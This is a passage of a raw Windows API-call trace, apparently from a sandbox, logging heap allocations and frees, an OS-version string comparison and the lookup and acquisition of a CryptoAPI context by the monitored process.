RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0196.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0196.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0196.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0196.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.684] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0196.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0196.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0196.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.685] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0196.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.686] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0196.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0196.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0196.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0196.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0196.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0196.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0196.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0196.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.687] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.688] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0196.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.688] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0196.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0196.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.688] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0196.689] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0196.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0196.689] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0196.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0196.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0196.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.692] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0196.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0196.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.694] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0196.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0196.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0196.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.694] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0196.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0196.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.695] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6480) returned 1 [0196.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 